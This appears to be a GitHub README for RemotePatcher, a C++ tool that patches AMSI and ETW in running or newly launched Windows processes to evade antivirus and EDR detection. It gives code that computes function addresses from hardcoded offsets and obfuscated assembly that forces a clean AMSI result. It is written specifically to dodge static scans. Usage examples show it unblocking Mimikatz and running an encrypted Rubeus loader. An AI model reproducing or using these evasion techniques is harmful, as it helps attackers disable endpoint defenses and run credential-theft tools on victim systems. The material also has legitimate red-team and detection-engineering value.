RemotePatcher

I found that some EDR like Cortex XDR would pick up C# implemetation of AMSI/ETW patch functions. Instead of obfuscating someone’s codes, I decided to write a tinny program to do the same thing, as well as practice C++ programming skill.

A Little Twist

We could do a little twist to bypass static scan of AV.

Calculating memory address

Instead of getting the memory address of AMSIScanBuffer() and EtwEventWrite() directly, we could calculate it.

In amsi.dll, memory address of AMSIScanBuffer() is 0x1AF0 apart from DllRegisterServer()

void* dummyAddr = GetProcAddress(amsiDllHandle, "DllRegisterServer");
char* amsiAddr = (char*)dummyAddr + 6896;

In ntdll.dll, memory address of EtwEventWrite() is 0x15D0 apart from RtlSetLastWin32Error()

void* dummyAddr = GetProcAddress(ntDllHandle, "RtlSetLastWin32Error");
char* etwAddr = (char*)dummyAddr - 5584;

Remark: Tested on Windows 10 (Build 19043)

Obtaining assembly code

@RastaMouse’s assembly code that commonly used

mov eax, 0x80070057
ret

Make a bit calucation but still do the same which return AMSI_RESULT_CLEAN

xor    eax,eax
add    eax,0x7dfdfe4e
add    eax,0x02090209
ret

Convert aeesmbly code to hex byte array here

Usage

cmd> .\RemotePatcher.exe -h
RemotePatcher
More info: https://github.com/Hagrid29/RemotePatcher/
Options:
  --exe "[cmd]" the program that will be executed and patched
  --pid [pid]   the process ID that will be patched
  -a            to NOT patch AMSI
  -e            to NOT patch ETW
  -l            to NOT load amsi.dll

Patch existing process

PS> "Invoke-Mimikatz"
At line:1 char:1
+ "Invoke-Mimikatz"
+ ~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS> $pid
9756
PS> .\RemotePatcher.exe --pid 9756 -l
[+] Patched etw!
[+] Patched amsi!
PS> "Invoke-Mimikatz"
Invoke-Mimikatz

Start a new program

CSLoader.exe is a C# binary of NetLoader with AMSI/ETW patch functions removed.

.\RemotePatcher.exe --exe ".\CSLoader.exe --path rubeus.txt --key mykey --args hash /password:aaa"
[+] Patched etw!
[+] Patched amsi!
[+] Decrypting using key 'mykey'
[+] PATH : ru.txt
[+] Arguments : hash /password:aaa
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : aaa
[*]       rc4_hmac             : E24106942BF38BCF57A6A4B29016EFF6

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

References

GitHub

View Github